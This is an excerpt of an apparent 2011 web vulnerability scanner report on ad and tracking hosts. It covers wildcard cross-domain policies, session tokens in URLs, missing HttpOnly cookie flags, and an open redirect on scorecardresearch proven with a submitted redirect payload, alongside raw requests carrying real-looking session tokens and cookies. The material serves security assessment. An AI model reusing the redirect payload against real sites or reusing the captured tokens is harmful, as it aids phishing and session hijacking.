5.1. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Thu, 23 Jun 2011 13:44:28 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 24 Jun 2011 11:13:03 GMT
Date: Thu, 23 Jun 2011 11:13:03 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6. Session token in URL previous next
There are 3 instances of this issue:

http://api.demandbase.com/api/v2/ip.json
http://l.sharethis.com/pview
http://license.icopyright.net/rights/tag.act

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

6.1. http://api.demandbase.com/api/v2/ip.json previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://api.demandbase.com
Path:	/api/v2/ip.json

Issue detail

The URL in the request appears to contain a session token within the query string:

http://api.demandbase.com/api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6&callback=dbase_parse

Request

GET /api/v2/ip.json?token=b155ec5d50b5dcb41662f36b4d10a6f7702c87e6&callback=dbase_parse HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Api-Version: v2
Content-Type: application/javascript;charset=utf-8
Date: Thu, 23 Jun 2011 13:44:18 GMT
Server: Apache
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Content-Length: 212
Connection: keep-alive

dbase_parse({"registry_city":"Dallas","registry_state":"TX","registry_company_name":"Media Visions","registry_zip_code":"75207","ip":"173.193.214.243","registry_area_code":214,"registry_country":"Unit
...[SNIP]...

6.2. http://l.sharethis.com/pview previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://l.sharethis.com
Path:	/pview

Issue detail

The URL in the request appears to contain a session token within the query string:

http://l.sharethis.com/pview?event=pview&publisher=cb989899-4892-4632-ab73-61a27b257844&hostname=www.wmg.com&location=%2Fnewsdetails%2Fid%2F8a0af812309ad0530130ae22179a018e&url=http%3A%2F%2Fwww.wmg.com%2Fnewsdetails%2Fid%2F8a0af812309ad0530130ae22179a018e&sessionID=1308834507221.85314&fpc=73edc66-130bc9da9d6-7ea6d75a-1&ts1308834509060.0&r_sessionID=&hash_flag=&shr=&count=0

Request

GET /pview?event=pview&publisher=cb989899-4892-4632-ab73-61a27b257844&hostname=www.wmg.com&location=%2Fnewsdetails%2Fid%2F8a0af812309ad0530130ae22179a018e&url=http%3A%2F%2Fwww.wmg.com%2Fnewsdetails%2Fid%2F8a0af812309ad0530130ae22179a018e&sessionID=1308834507221.85314&fpc=73edc66-130bc9da9d6-7ea6d75a-1&ts1308834509060.0&r_sessionID=&hash_flag=&shr=&count=0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.wmg.com/newsdetails/id/8a0af812309ad0530130ae22179a018e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspjoE3OVb2YWRTJR8rMAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Thu, 23 Jun 2011 13:08:29 GMT
Connection: keep-alive

6.3. http://license.icopyright.net/rights/tag.act previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://license.icopyright.net
Path:	/rights/tag.act

Issue detail

The response contains the following links that appear to contain session tokens:

http://license.icopyright.net/rights/termsOfUse.act;jsessionid=A9CDA4EB3FDC025F39C802E4AD94520C

Request

GET /rights/tag.act?tag=7.7009 HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

7. Open redirection previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a3237487dad68a1d6/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

http://a3237487dad68a1d6/a?gif

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.

Request

GET /r?c2=3005648&d.c=http%3a//a3237487dad68a1d6/a%3fgif&d.o=wmg&d.x=13037903&d.t=page&d.u=http%3A%2F%2Fwww.wmg.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.wmg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a3237487dad68a1d6/a?gif
Date: Thu, 23 Jun 2011 13:08:20 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sat, 22-Jun-2013 13:08:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

8. Cookie without HttpOnly flag set previous next
There are 23 instances of this issue:

http://license.icopyright.net/rights/tag.act
http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://a.tribalfusion.com/j.ad
http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
http://ad.trafficmp.com/a/bpix
http://ad.turn.com/server/pixel.htm
http://ad.yieldmanager.com/pixel
http://ad.yieldmanager.com/unpixel
http://ads.revsci.net/adserver/ako
http://ads.revsci.net/adserver/ako
http://ak1.abmr.net/is/tag.contextweb.com
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/rtset
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cw-m.d.chango.com/m/cw
http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000
http://delivery.steelhousemedia.com/serve
http://future.grapeshot.co.uk/tech/channels.cgi
http://i.w55c.net/ping_match.gif
http://js.revsci.net/gateway/gw.js

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

8.1. http://license.icopyright.net/rights/tag.act previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://license.icopyright.net
Path:	/rights/tag.act

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; Path=/rights

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

8.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

480-SM=adver_06-20-2011-20-17-03; expires=Sun, 26-Jun-2011 13:44:47 GMT; path=/; domain=c3metrics.com
480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-23-2011-13-44-47_15862708731308836687; expires=Tue, 21-Jun-2016 13:44:47 GMT; path=/; domain=c3metrics.com
480-nUID=adver_15862708731308836687; expires=Thu, 23-Jun-2011 13:59:47 GMT; path=/; domain=c3metrics.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011-20-17-03; 480-VT=advertop100_06-16-2011-18-32-39_15277004981308249159ZZZZadver_06-20-2011-20-17-03_8887292771308601023; SERVERID=s9

Response

8.3. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aGnrXgoNIZdfBa4YmZbgVxcyf3SLwZdPcZa1p4FUN1nH6BKL99QGadNWl9yo3fBDn7Y3UJeZbZcCoXbSNwE1vRGSBZcmjjuCRKbmI4ZdtEyMiVKZdTyycEB2iqOwjFKMr8x29LUleFNjHZaCaf4FULU7xS1AOxcBD6gFuK0ZbSqKAZa68ilZa4mP6ZcTU17RBO9TgOjVruNS2ZajkYyDUytBUSuZacP0hu140iTRF2pYWO1yHev1ZaOlPrZc7SWWL92ekwVRkr9oeM2EcZb5Za2DAvBFp5Bw4vL1ygtt9NEIehOpogZcJHZbWJNlJ0abaOUeXgcpsejKw33NxdSU9JZdfYk8A3CAu3sbZbryTWEaZc72b5mG3cEUeRXvbdSZd2MSnqvjjHqZd2RmbupCQCuAZb8n1PyaNpJGLejc6yD3f13Wq7wuh8mYPSK1AANFk9C3OffGNHZcidw5WnbkZdiRVsV9nsMG7aqt7iNZcpg1xm3CZa5uJcaW2FZapdtdT2Umk27yNPkD28FZaI9FZcAPLStwLOONi5ZcAskoZaHDTnM2Dd7thK1jKZbCLZaJecWJeeDxyMlJyO4aaWE9eHGbFD3aMY4Hq8vZaMb03HGybi5ZbHZbhZbi9YF30xyK4I3q9Tfy9OlNnLLAcjJrPEMR4IkPktMR4VFkNOEOsS1wNww5mH0VvjZdYqZdWicM4qsKOHZc2Ldd8ssGmXwZc8onsZd8DBjif68WDdhvTKseAhrH8KG0FZaA6sDMdOdgolUqxp3GQpEM4RcBvWuRXgaetUOJRblZb9; path=/; domain=.tribalfusion.com; expires=Wed, 21-Sep-2011 13:44:36 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=ibnlive&adSpace=tech&tagKey=2057624979&th=24693616604&tKey=undefined&size=728x90&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fibnlive.in.com%2Fgeneralnewsfeed%2Fnews%2Ffinancial-firms-required-to-beef-up-computer-security%2F735356.html&f=0&p=16609087&a=1&rnd=16610418 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a3noAWM0iHd1Za0y6QN0g8GPZasdhNDD7cvXa1Za5Gy1x9OJZaWJNVvtmpTdwD9NtVKZcvsZatwM4LmFE9Za8FQjhJlvRZbjHvZcZaTUImZcoro2pp8SYTW2ZaGDjRaGo2jD0oUbeuClVNkmhNgTwekGZdfxCBqqpob7M2ZaLZcgZdIIR9pQygreM2q8BE961KxfyKWOPNV445OIZcIRAdOZbFxZaUo2kuvaTvxK9mZdptns1L0oZblakrEkaNfuwIibV7nXqAgo357G3Eo0V7PSLF3uCmAbmgkhadEXXGKZbLyqkDW6kKRq2tUsquOkIAuDZbANN4VKsmAlDkfUYLAFjUZbd25owWY6E77RZcoe2ylZbk6GXZbXrbNYtFBNaQucZaZa3ZbwTgKcdZcZb78hBgBeRGBaVbjZdSY030AiOSfGbTfiOdgGxOq3i6ndvsxZc9ZcdKAp08DHXkiOdDsZdtHJ2xE9pMQhlfHYZaMAHMxHKQaTmS1vuaZbWyZbMg4hX1qxLVaW8AgP49OGZaxINmDXOWcV4B7pU0nUfsJ9DY65FZaUunZdivpvlaYUNaIHUyKQQ2eWkc0aZaVZahlAl858iFXvf3dajZaoLohtjol6Pmn4S9ps5dentofTA3qc6Dc3wvhfyTgdsduyKL0xZdDP0bc5IpG006YWGiOJef0eggU587pNs1HsiunZbC0I3BDLv1M2I8iqbJA6UUv1YhqCZcqnN4g0ttZchIuZaGkipcVBItSFGKeIa9pUPSMlnkhxql

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aGnrXgoNIZdfBa4YmZbgVxcyf3SLwZdPcZa1p4FUN1nH6BKL99QGadNWl9yo3fBDn7Y3UJeZbZcCoXbSNwE1vRGSBZcmjjuCRKbmI4ZdtEyMiVKZdTyycEB2iqOwjFKMr8x29LUleFNjHZaCaf4FULU7xS1AOxcBD6gFuK0ZbSqKAZa68ilZa4mP6ZcTU17RBO9TgOjVruNS2ZajkYyDUytBUSuZacP0hu140iTRF2pYWO1yHev1ZaOlPrZc7SWWL92ekwVRkr9oeM2EcZb5Za2DAvBFp5Bw4vL1ygtt9NEIehOpogZcJHZbWJNlJ0abaOUeXgcpsejKw33NxdSU9JZdfYk8A3CAu3sbZbryTWEaZc72b5mG3cEUeRXvbdSZd2MSnqvjjHqZd2RmbupCQCuAZb8n1PyaNpJGLejc6yD3f13Wq7wuh8mYPSK1AANFk9C3OffGNHZcidw5WnbkZdiRVsV9nsMG7aqt7iNZcpg1xm3CZa5uJcaW2FZapdtdT2Umk27yNPkD28FZaI9FZcAPLStwLOONi5ZcAskoZaHDTnM2Dd7thK1jKZbCLZaJecWJeeDxyMlJyO4aaWE9eHGbFD3aMY4Hq8vZaMb03HGybi5ZbHZbhZbi9YF30xyK4I3q9Tfy9OlNnLLAcjJrPEMR4IkPktMR4VFkNOEOsS1wNww5mH0VvjZdYqZdWicM4qsKOHZc2Ldd8ssGmXwZc8onsZd8DBjif68WDdhvTKseAhrH8KG0FZaA6sDMdOdgolUqxp3GQpEM4RcBvWuRXgaetUOJRblZb9; path=/; domain=.tribalfusion.com; expires=Wed, 21-Sep-2011 13:44:36 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 226
Expires: 0
Connection: keep-alive

document.write('\r\n<SCRIPT TYPE="text/javascript" SRC="http://ad.z5x.net/st?ad_type=ad&ad_size=728x90&section=762900"><\/SCRIP
...[SNIP]...

8.4. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fut.gb.tr/news.Internet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=ca39e2f390000cb||t=1308836889|et=730|cs=5fddn5r5; path=/; domain=.doubleclick.net; expires=Sat, 22 Jun 2013 13:48:09 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 22 Jun 2011 13:48:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/fut.gb.tr/news.Internet;kw=UK;kw=security;kw=computing;tile=1;sz=22x22;;gs_cat=antivirus;kw=undefined;ord=881332705? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.techradar.com/news/internet/uk-most-paranoid-about-computer-security-suggests-study-969910
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 327
Set-Cookie: id=ca39e2f390000cb||t=1308836889|et=730|cs=5fddn5r5; path=/; domain=.doubleclick.net; expires=Sat, 22 Jun 2013 13:48:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 22 Jun 2011 13:48:09 GMT
Date: Thu, 23 Jun 2011 13:48:09 GMT
Expires: Thu, 23 Jun 2011 13:48:09 GMT
Cache-Control: private

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b2f/0/0/%2a/v;44306;0-0;0;23314830;19733-22/22;0/0/0;;~okv=;kw=UK;kw=security;kw=computing;tile=1;sz=22x22;;gs_cat=antivi
...[SNIP]...

8.5. http://ad.trafficmp.com/a/bpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.trafficmp.com
Path:	/a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

T_5s5d=c8z%3A207o4%3A1; Domain=trafficmp.com; Expires=Fri, 22-Jun-2012 13:09:42 GMT; Path=/
rth=2-ll8nk2-c8z~207o4~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Fri, 22-Jun-2012 13:09:42 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?top=7-1926.1&dp=10004 HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://www.vitimb.com/new-inventory
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab=7; nat=1305981242875; uid2=4372bf1d7-7ad8-48eb-b49d-630d41f880f6-gnq0edmv-10~2011051519270862126421219180~59a3b184-a1c6-4aca-8101-9ed4e07fe4c6-31~3460050161923843111~375c6d96-66e4-4358-973b-0d6c0203afb3; dly2=3-lmv2b7-; dmg2=2-null7566%4051%4060+65%3A61%3A64%3ACZ+%7Cnulll%7CHHF%7CX357%7CIIG%7CQ599.055%7CS50127%7C1fbsgynlre.pbz%7CJ078%7CWfbsgynlre+grpuabybtvrf+vap.%7CLfgbjr%7CR%40527.191%7Cnull%40955%7CDoebnqonaq%7CZ%3F%7C-; hst2=3-lmv2b7-1~fkog64qf50c8~13uj~5al9~0-1~138yfzzfhnn6~136l~5hy9~1bcqu-; pct=1-oevyvt~gnyji5u3-vOrunivbe~gnyji5u2-yhpvq~gnyji5u3-; T_et6=c8z%3A2028x%3A1; rth=2-ll8nk2-c8z~2028x~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Thu, 23 Jun 2011 13:09:42 GMT
Connection: close
Set-Cookie: T_et6=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_2hcq=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_e02x=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_b9m7=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_hbe9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_5s5d=c8z%3A207o4%3A1; Domain=trafficmp.com; Expires=Fri, 22-Jun-2012 13:09:42 GMT; Path=/
Set-Cookie: rth=2-ll8nk2-c8z~207o4~1~1-ihn~1trsh~1~1-i6p~xuvr~1~1-d3b~wekz~1~1-5d8~ps6l~1~1-40~opiw~1~1-41~ms0a~1~1-djj~ml3p~1~1-g9a~mkwu~1~1-gfx~maxm~1~1-djc~m9g8~1~1-g9e~m8m9~1~1-dim~m821~1~1-dil~m811~1~1-icn~m7h0~1~1-icz~m7ep~1~1-gqh~m7do~1~1-iel~m79d~1~1-dlx~fde4~1~1-h4d~b20b~1~1-g96~9x0t~1~1-jd9~z20~1~1-77k~yl0~1~1-ag9~yjm~1~1-di9~3~1~1-6aq~0~1~1-; Domain=trafficmp.com; Expires=Fri, 22-Jun-2012 13:09:42 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

8.6. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 20-Dec-2011 13:44:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=12 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=o4ZhYxPJ2Pw5XfvbQhsaFpDfbEnc9w-vODw3bflONElh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCaeoKEGWRrYa1j0O8IgD5vMnwFS7HtMXofNHrftsH-bKaR7vykJ4G_blnocTkHaMlPW77G4xQCEJUEws-BatYXJ6IYC8WBTQX8bUUIXmPY-LZw3JJMkqx51w1pR2YtuCpq6FZW9ee6pqepxcDrSlSmqIMYGmHJG75FIrenYIGOYR5O0czW-xR8eItR9Et5IZyk-3dtU8NWxmwQveYnMRjYK7u1KunjyAhI4wjE-uujeSVGDu5X63VUZQiL9158oTLi4YKJ8H0IRHnj6n6s75qKvM_F4QDFXNXDASdDuX36Wkzp15bX7OJQXizqFWPuRMtGo3I48fCleB9QRLmssYnqhwVp1d1lcuv8Oi-bAzofc8JKSrpSfruct-wsYLh-MTRC22HhlIXg-C3QmlQPe2jan2qzWIFcW73-ffTz4aBpEcHMJy0LW8k-xOEVdrjWU9Du1zMeHAy7ZZoSm8iv5WlzLijE8Sr5GgLBM0V_efj8wkT0pwQwhdI7QCRTHyjVkbrJq_P48i1E6YSPriW57bBIAv4IzT6zG86PBT5DByM8URH6aMpx3xlY8nTvgssFknIvh_X9bzHYS-B9LdlbAgcLLdD37vgtqknSg2EWl8FZYzTR7vykJ4G_blnocTkHaMlPYcsVEyjwEavPZ1IOQB-k76IYC8WBTQX8bUUIXmPY-LZOAc3GkX-Xd6ueK8RLrApqcNXPoKSnz19gf43sN51hM0MYGmHJG75FIrenYIGOYR5sK2sI9UrBz0jKXQxWnwAHe3dtU8NWxmwQveYnMRjYK5roYtEm1m2ljA5TnK4b-ETzYtUd86s7MhdQdfuW2QJ-O9qBflBAlKfYsj0c9fffeCHkZfYN0i6ORTQwcAoE_bXp15bX7OJQXizqFWPuRMtGst8JIuCgxLilohaEpCojUhvsDM2i9ZkSeodg2n84FubH8xw0gLkNMgYofMuPt-PkO8T0cGKn4uRx4CMmEsBWiKqzWIFcW73-ffTz4aBpEcHFs6L3zNdz5ZjoOzvPQTfb835UBdTu1PnDKNhFUbfz_4bftaK-dcMAPf-7IWagRhOwZr_Z_WRhdQvL8CTs4JYMK_P48i1E6YSPriW57bBIAukpN8NUt-_Qle288Cz3gyRLJfQW9W423bNMd7giheysbXds6tq7dVAQSvAX_f_7sdXQLEl7c5RtdI6fIas1hLmR7vykJ4G_blnocTkHaMlPf6EzPEWOsOXwfj5fQxhr_GIYC8WBTQX8bUU